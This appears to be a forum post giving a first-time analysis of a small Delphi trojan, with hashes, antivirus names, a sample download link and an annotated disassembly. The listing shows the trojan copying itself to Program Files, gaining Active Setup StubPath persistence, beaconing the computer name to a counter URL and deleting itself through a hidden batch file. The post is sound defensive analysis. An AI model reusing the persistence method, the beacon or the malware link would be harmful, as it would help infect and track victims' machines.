File: C:\Documents and Settings\Administrator\桌面\temp\game.exe
Size: 13824 bytes
Modified: 2010年1月22日星期五, 11:08:01
MD5: D80E710C62D064EF6E98694244C5EC22
SHA1: A1BE80A1C215D9CBAFBE54E417B023E4898856CA
CRC32: 9BCAB632
瑞星:Trojan.Win32.Generic.51F7C34C
金山毒霸:Win32.Troj.Scar.13824
卡巴斯基:Trojan.Win32.Scar.bdrm
PESniffer: Borland Delphi 4.0
PEiDDSCAN: Borland Delphi 6.0 - 7.0
样本下载链接:http://www.qqwg.tk/wm/game.exe
;-----------------------------------------------------------------------
; 0040138C: fetch one command-line argument by index into a string.
; Delphi register convention: eax = index, edx = out string.
; index 0  -> GetModuleFileName(NULL, ...) = path of the running exe
; index n  -> GetCommandLineA is walked n times via 004012A0
; NOTE(review): the shape matches Delphi's System.ParamStr - confirm
; against the RTL before relying on that name.
; Stack: 0x108 bytes reserved as the GetModuleFileName buffer.
; Helpers 00401BB0 / 00401C74 / 004012A0 are outside this excerpt; their
; roles below are inferred only from how they are called.
;-----------------------------------------------------------------------
0040138C /$ 53 push ebx
0040138D |. 56 push esi
0040138E |. 57 push edi
0040138F |. 81C4 F8FEFFFF add esp, -108 ; 0x108-byte path buffer at [esp]
00401395 |. 8BDA mov ebx, edx ; ebx = out string (edx arg)
00401397 |. 8BF0 mov esi, eax ; esi = index (eax arg)
00401399 |. 8BC3 mov eax, ebx
0040139B |. E8 10080000 call 00401BB0 ; presumably clears the out string first - verify
004013A0 |. 85F6 test esi, esi ; index == 0 ?
004013A2 |. 75 1E jnz short 004013C2 ; no: walk the command line instead
004013A4 |. 68 05010000 push 105 ; /BufSize = 105 (261.) = MAX_PATH + 1
004013A9 |. 8D4424 04 lea eax, dword ptr [esp+4] ; |start of the local buffer
004013AD |. 50 push eax ; |PathBuffer = 0012FE80
004013AE |. 6A 00 push 0 ; |hModule = NULL -> the process image itself
004013B0 |. E8 7FFCFFFF call <jmp.&kernel32.GetModuleFileName>; \get the sample's own path
004013B5 |. 8BC8 mov ecx, eax ; ecx = length returned
004013B7 |. 8BD4 mov edx, esp ; edx = buffer
004013B9 |. 8BC3 mov eax, ebx ; eax = out string
004013BB |. E8 B4080000 call 00401C74 ; presumably builds the string from (buffer, length) - verify
004013C0 |. EB 1E jmp short 004013E0
004013C2 |> E8 95FCFFFF call <jmp.&kernel32.GetCommandLineA> ; [GetCommandLineA
004013C7 |. 8BF8 mov edi, eax ; edi = cursor into the command line
004013C9 |> 8BD3 /mov edx, ebx ; loop: edx = out string
004013CB |. 8BC7 |mov eax, edi ; eax = cursor
004013CD |. E8 CEFEFFFF |call 004012A0 ; presumably extracts one argument and returns the advanced cursor in eax - verify
004013D2 |. 8BF8 |mov edi, eax
004013D4 |. 85F6 |test esi, esi ; index counted down to 0 -> done
004013D6 |. 74 08 |je short 004013E0
004013D8 |. 833B 00 |cmp dword ptr [ebx], 0 ; out string empty -> no more arguments, done
004013DB |. 74 03 |je short 004013E0
004013DD |. 4E |dec esi
004013DE |.^ EB E9 \jmp short 004013C9
004013E0 |> 81C4 08010000 add esp, 108 ; release the local buffer
004013E6 |. 5F pop edi
004013E7 |. 5E pop esi
004013E8 |. 5B pop ebx
004013E9 \. C3 retn
;-----------------------------------------------------------------------
; 00402418: stdcall wrapper around kernel32.CreateMutexA (retn 0C = 3 args).
;   [ebp+8]  = lpMutexAttributes
;   [ebp+C]  = bInitialOwner (Pascal boolean, normalised to 0/1 below)
;   [ebp+10] = lpName
; Returns the mutex handle in eax.
; NOTE(review): looks like Delphi's Windows.CreateMutex thunk - verify.
; The observed call (OllyDbg annotations) used the name "TestD";
; presumably a run-once marker, and a usable host-based indicator.
;-----------------------------------------------------------------------
00402418 /$ 55 push ebp
00402419 |. 8BEC mov ebp, esp
0040241B |. 8B45 10 mov eax, dword ptr [ebp+10]
0040241E |. 50 push eax ; /MutexName = "TestD"
0040241F |. 837D 0C 01 cmp dword ptr [ebp+C], 1 ; |CF = (arg == 0)
00402423 |. 1BC0 sbb eax, eax ; |eax = arg ? 0 : -1
00402425 |. 40 inc eax ; |eax = arg ? 1 : 0
00402426 |. 83E0 7F and eax, 7F ; |mask down to a clean BOOL
00402429 |. 50 push eax ; |InitialOwner = TRUE
0040242A |. 8B45 08 mov eax, dword ptr [ebp+8] ; |
0040242D |. 50 push eax ; |pSecurity = NULL
0040242E |. E8 DDFFFFFF call <jmp.&kernel32.CreateMutexA> ; \create a mutex named "TestD"
00402433 |. 5D pop ebp ; 0012FF98
00402434 \. C2 0C00 retn 0C ; stdcall: callee pops the three args
;-----------------------------------------------------------------------
; 00402E14: fill the string in eax with the local computer name.
; In:  eax = out string (kept in esi)
; A single dword local (the pushed ecx) is the in/out size for
; GetComputerNameA, initialised to 0FF. The API's return value is not
; checked. Helpers 0040112C / 00401CB4 / 00401144 are outside this
; excerpt; from their use they look like allocate / assign PChar to
; string / free - verify against the Delphi RTL.
; The value seen here ("9117ECDD07004EB") is the analysis machine's
; name; it is what the beacon in 00402DDC sends as the "mac=" parameter.
;-----------------------------------------------------------------------
00402E14 /$ 53 push ebx
00402E15 |. 56 push esi
00402E16 |. 51 push ecx ; reserve one dword local at [esp]
00402E17 |. 8BF0 mov esi, eax ; esi = out string
00402E19 |. C70424 FF0000>mov dword ptr [esp], 0FF ; local = 255 = buffer size
00402E20 |. 8B0424 mov eax, dword ptr [esp]
00402E23 |. E8 04E3FFFF call 0040112C ; presumably allocates 0xFF bytes, buffer in eax - verify
00402E28 |. 8BD8 mov ebx, eax ; ebx = buffer
00402E2A |. 54 push esp ; /pBufferSize = 0012FF70 (the local, in/out)
00402E2B |. 53 push ebx ; |Buffer = 001583E0
00402E2C |. E8 0FF6FFFF call <jmp.&kernel32.GetComputerNameA> ; \retrieve the local computer name (result unchecked)
00402E31 |. 8BC6 mov eax, esi ; eax = out string
00402E33 |. 8BD3 mov edx, ebx ; ASCII "9117ECDD07004EB" = the computer name
00402E35 |. E8 7AEEFFFF call 00401CB4 ; presumably assigns the PChar buffer to the string - verify
00402E3A |. 8BC3 mov eax, ebx
00402E3C |. E8 03E3FFFF call 00401144 ; presumably frees the buffer - verify
00402E41 |. 5A pop edx ; discard the size local
00402E42 |. 5E pop esi
00402E43 |. 5B pop ebx
00402E44 \. C3 retn
;-----------------------------------------------------------------------
; 00402DDC: HTTP beacon. In: eax = URL string (kept in esi).
;   InternetOpenA(agent @00402E10, 0, NULL, NULL, 0)
;   InternetOpenUrlA(hInternet, url, NULL, 0, 0, 0)
; The observed URL appends the computer name from 00402E14 as "mac=",
; so the server side counts infections by host name, not MAC address.
; Neither handle is closed in this function (no InternetCloseHandle in
; the excerpt). 00401E38 is presumably string -> PChar - verify.
; Network indicator on this page: a GET to www.qqwg.tk/tj/Count.asp
; with a "mac=<computer name>" query.
; Listing note: the line at 00402DE0 is pasted twice below; the binary
; has four "push 0" (DE0, DE2, DE4, DE6) before the agent push.
;-----------------------------------------------------------------------
00402DDC /$ 53 push ebx
00402DDD |. 56 push esi
00402DDE |. 8BF0 mov esi, eax ; ASCII "http://www.qqwg.tk/tj/Count.asp?mac=9117ECDD07004EB"
00402DE0 |. 6A 00 push 0 ; dwFlags = 0
00402DE0 |. 6A 00 push 0 ; duplicate of the line above (paste artifact, same address)
00402DE2 |. 6A 00 push 0 ; lpszProxyBypass = NULL
00402DE4 |. 6A 00 push 0 ; lpszProxy = NULL
00402DE6 |. 6A 00 push 0 ; dwAccessType = 0 = INTERNET_OPEN_TYPE_PRECONFIG
00402DE8 |. 68 102E4000 push 00402E10 ; lpszAgent (string at 00402E10, not shown on this page)
00402DED |. E8 3AFFFFFF call <jmp.&wininet.InternetOpenA>
00402DF2 |. 8BD8 mov ebx, eax ; ebx = hInternet (never closed here)
00402DF4 |. 6A 00 push 0 ; dwContext = 0
00402DF6 |. 6A 00 push 0 ; dwFlags = 0
00402DF8 |. 6A 00 push 0 ; dwHeadersLength = 0
00402DFA |. 6A 00 push 0 ; lpszHeaders = NULL
00402DFC |. 8BC6 mov eax, esi ; ASCII "http://www.qqwg.tk/tj/Count.asp?mac=9117ECDD07004EB"
00402DFE |. E8 35F0FFFF call 00401E38 ; presumably string -> PChar - verify
00402E03 |. 50 push eax ; lpszUrl
00402E04 |. 53 push ebx ; hInternet
00402E05 |. E8 2AFFFFFF call <jmp.&wininet.InternetOpenUrlA> ; request the counter URL with the computer name appended after mac= - tallies infected hosts
00402E0A |. 5E pop esi ; ASCII "http://www.qqwg.tk/tj/Count.asp?mac=9117ECDD07004EB"
00402E0B |. 5B pop ebx
00402E0C \. C3 retn
;-----------------------------------------------------------------------
; 00402FBC: create a registry key and write one string value under it.
; Delphi register convention:
;   eax     = root hKey (kept in esi)      observed: HKEY_LOCAL_MACHINE
;   edx     = subkey string     -> [ebp-4]
;   ecx     = value name        -> [ebp-8]
;   [ebp+8] = data string (4th arg, on the stack)
;   [ebp-C] = hKey returned by RegCreateKeyA
; bl = 1 if RegSetValueExA succeeded; how that reaches the caller is in
; the epilogue at 00403068, which is not part of this excerpt.
; Observed call: HKLM\SOFTWARE\Microsoft\Active Setup\Installed
; Components\{2bf41072-b2b1-21c1-b5c1-0305f4155515}\StubPath = path of
; the dropped exe - Active Setup persistence (StubPath runs at logon).
; Helpers 00401E28 / 00401CE4 / 00401E38 / 00401BD4 / 00401BB0 are not
; shown; presumably Delphi string addref / length / PChar / clear
; routines - verify.
;-----------------------------------------------------------------------
00402FBC /$ 55 push ebp
00402FBD |. 8BEC mov ebp, esp
00402FBF |. 83C4 F4 add esp, -0C ; three dword locals
00402FC2 |. 53 push ebx
00402FC3 |. 56 push esi
00402FC4 |. 894D F8 mov dword ptr [ebp-8], ecx ; [ebp-8] = value name
00402FC7 |. 8955 FC mov dword ptr [ebp-4], edx ; [ebp-4] = subkey
00402FCA |. 8BF0 mov esi, eax ; esi = root key
00402FCC |. 8B45 FC mov eax, dword ptr [ebp-4]
00402FCF |. E8 54EEFFFF call 00401E28 ; presumably addref on each string arg - verify
00402FD4 |. 8B45 F8 mov eax, dword ptr [ebp-8]
00402FD7 |. E8 4CEEFFFF call 00401E28
00402FDC |. 8B45 08 mov eax, dword ptr [ebp+8]
00402FDF |. E8 44EEFFFF call 00401E28
00402FE4 |. 33C0 xor eax, eax
00402FE6 |. 55 push ebp ; --- SEH record (try/finally) built on the stack
00402FE7 |. 68 61304000 push 00403061 ; handler address
00402FEC |. 64:FF30 push dword ptr fs:[eax] ; previous fs:[0]
00402FEF |. 64:8920 mov dword ptr fs:[eax], esp ; install the record
00402FF2 |. 33DB xor ebx, ebx ; ebx = success flag = 0
00402FF4 |. 8D45 F4 lea eax, dword ptr [ebp-C]
00402FF7 |. 50 push eax ; /phkResult = &[ebp-C]
00402FF8 |. 8B45 FC mov eax, dword ptr [ebp-4]
00402FFB |. E8 38EEFFFF call 00401E38 ; |subkey -> PChar
00403000 |. 50 push eax ; |Subkey = "SOFTWARE\Microsoft\Active Setup\Installed Components\{2bf41072-b2b1-21c1-b5c1-0305f4155515}"
00403001 |. 56 push esi ; |hKey = HKEY_LOCAL_MACHINE
00403002 |. E8 E9F3FFFF call <jmp.&advapi32.RegCreateKeyA> ; \create/open the key (result not checked)
00403007 |. 8B45 08 mov eax, dword ptr [ebp+8]
0040300A |. E8 D5ECFFFF call 00401CE4 ; presumably string length -> cbData - verify
0040300F |. 50 push eax ; /cbData
00403010 |. 8B45 08 mov eax, dword ptr [ebp+8]
00403013 |. E8 20EEFFFF call 00401E38 ; |data -> PChar
00403018 |. 50 push eax ; |lpData
00403019 |. 6A 02 push 2 ; |dwType = 2 = REG_EXPAND_SZ
0040301B |. 6A 00 push 0 ; |Reserved = 0
0040301D |. 8B45 F8 mov eax, dword ptr [ebp-8]
00403020 |. E8 13EEFFFF call 00401E38 ; |value name -> PChar
00403025 |. 50 push eax ; |ValueName = "StubPath"
00403026 |. 8B45 F4 mov eax, dword ptr [ebp-C] ; |
00403029 |. 50 push eax ; |hKey = 90 (from RegCreateKeyA)
0040302A |. E8 D1F3FFFF call <jmp.&advapi32.RegSetValueExA> ; \write the value
0040302F |. 85C0 test eax, eax ; ERROR_SUCCESS ?
00403031 |. 75 02 jnz short 00403035
00403033 |. B3 01 mov bl, 1 ; bl = 1 on success
00403035 |> 8B45 F4 mov eax, dword ptr [ebp-C]
00403038 |. 50 push eax ; /hKey = 00000090 (the key created above)
00403039 |. E8 AAF3FFFF call <jmp.&advapi32.RegCloseKey> ; \close it
0040303E |. 33C0 xor eax, eax ; --- finally: unlink the SEH record
00403040 |. 5A pop edx ; edx = previous fs:[0]
00403041 |. 59 pop ecx ; discard handler address
00403042 |. 59 pop ecx ; discard saved ebp
00403043 |. 64:8910 mov dword ptr fs:[eax], edx ; restore fs:[0]
00403046 |. 68 68304000 push 00403068 ; return address for the finally block (epilogue at 00403068 not shown)
0040304B |> 8D45 F8 lea eax, dword ptr [ebp-8]
0040304E |. BA 02000000 mov edx, 2
00403053 |. E8 7CEBFFFF call 00401BD4 ; presumably clears the two string locals [ebp-8], [ebp-4] - verify
00403058 |. 8D45 08 lea eax, dword ptr [ebp+8]
0040305B |. E8 50EBFFFF call 00401BB0 ; presumably clears the string arg - verify
00403060 \. C3 retn ; pops 00403068 and continues there (outside this excerpt)
;-----------------------------------------------------------------------
; 004033EC: program entry (Delphi main block). Only the part up to the
; RegDeleteKeyA call is shown; the rest of the function is not on this
; page. Visible sequence:
;   1. CopyFileA(own path via 0040138C index 0,
;                "C:\Program Files\Ma0ya0.exe", FailIfExists = TRUE)
;      - drops a copy of itself; an already present copy is kept.
;   2. 00402FBC writes HKLM\SOFTWARE\Microsoft\Active Setup\Installed
;      Components\{2bf41072-b2b1-21c1-b5c1-0305f4155515}\StubPath =
;      "C:\Program Files\Ma0ya0.exe"  (Active Setup persistence).
;   3. RegDeleteKeyA(HKEY_CURRENT_USER, same subkey) - under the usual
;      Active Setup semantics, removing the per-user copy of the key
;      makes StubPath run again at the next logon.
; Host indicators on this page: the dropped path, the Active Setup GUID
; above, and its StubPath value.
;-----------------------------------------------------------------------
004033EC >/$ 55 push ebp
004033ED |. 8BEC mov ebp, esp
004033EF |. 83C4 EC add esp, -14 ; locals; [ebp-14] holds the own-path string
004033F2 |. 33C0 xor eax, eax
004033F4 |. 8945 EC mov dword ptr [ebp-14], eax ; string local = nil
004033F7 |. B8 9C334000 mov eax, 0040339C
004033FC |. E8 27EFFFFF call 00402328 ; presumably Delphi RTL/unit initialisation - verify
00403401 |. 33C0 xor eax, eax
00403403 |. 55 push ebp ; --- SEH record (try/finally)
00403404 |. 68 7B344000 push 0040347B ; handler address
00403409 |. 64:FF30 push dword ptr fs:[eax]
0040340C |. 64:8920 mov dword ptr fs:[eax], esp
0040340F |. 6A FF push -1 ; /FailIfExists = TRUE (CopyFileA, 3rd arg)
00403411 |. 68 88344000 push 00403488 ; |NewFileName: ASCII "C:\Program Files\Ma0ya0.exe"
00403416 |. 8D55 EC lea edx, dword ptr [ebp-14] ; |out string for 0040138C
00403419 |. 33C0 xor eax, eax ; |index 0
0040341B |. E8 6CDFFFFF call 0040138C ; |own executable path (GetModuleFileName branch)
00403420 |. 8B45 EC mov eax, dword ptr [ebp-14] ; |
00403423 |. E8 10EAFFFF call 00401E38 ; |presumably string -> PChar - verify
00403428 |. 50 push eax ; |ExistingFileName = own path; OllyDbg shows the GBK bytes of the desktop folder (桌面, see the File: line) garbled as D7,"烂鎈"
00403429 |. E8 DAEFFFFF call <jmp.&kernel32.CopyFileA> ; \copy itself to %ProgramFiles% as Ma0ya0.exe
; --- OllyDbg stack window at the CopyFileA call (堆栈 = stack) ---
堆栈
0012FF94 00158388 |ExistingFileName = "C:\Documents and Settings\Administrator\",D7,"烂鎈temp\game.exe"
0012FF98 00403488 |NewFileName = "C:\Program Files\Ma0ya0.exe"
0012FF9C FFFFFFFF \FailIfExists = TRUE
0040342E |. 68 AC344000 push 004034AC ; ASCII "C:\Program Files\Ma0ya0.exe" = value data (4th arg of 00402FBC, on the stack)
00403433 |. B9 D0344000 mov ecx, 004034D0 ; ASCII "StubPath" = value name
00403438 |. BA E4344000 mov edx, 004034E4 ; ASCII "SOFTWARE\Microsoft\Active Setup\Installed Components\{2bf41072-b2b1-21c1-b5c1-0305f4155515}" = subkey
0040343D |. B8 02000080 mov eax, 80000002 ; HKEY_LOCAL_MACHINE
00403442 |. E8 75FBFFFF call 00402FBC ; write HKLM ...\StubPath (see 00402FBC)
00403447 |. 68 40354000 push 00403540 ; /Subkey = "SOFTWARE\Microsoft\Active Setup\Installed Components\{2bf41072-b2b1-21c1-b5c1-0305f4155515}"
0040344C |. 68 01000080 push 80000001 ; |hKey = HKEY_CURRENT_USER
00403451 |. E8 A2EFFFFF call <jmp.&advapi32.RegDeleteKeyA> ; \delete the per-user Active Setup key so StubPath runs again at the next logon
;-----------------------------------------------------------------------
; 00403350: self-removal. 00403138 (not in this excerpt) runs first;
; per the original analysis it prepares "_deleteme.bat", which is then
; launched hidden through WinExec. The batch file's contents are not on
; this page. Host indicator: a hidden WinExec of "_deleteme.bat".
;-----------------------------------------------------------------------
00403350 /$ E8 E3FDFFFF call 00403138 ; presumably writes _deleteme.bat - verify (body not shown)
00403355 |. 6A 00 push 0 ; /ShowState = SW_HIDE
00403357 |. 68 64334000 push 00403364 ; |CmdLine = "_deleteme.bat"
0040335C |. E8 FFF0FFFF call <jmp.&kernel32.WinExec> ; \run the batch hidden; per the analysis it deletes the original file
00403361 \. C3 retn
第一次分析,恳请路过大牛不吝赐教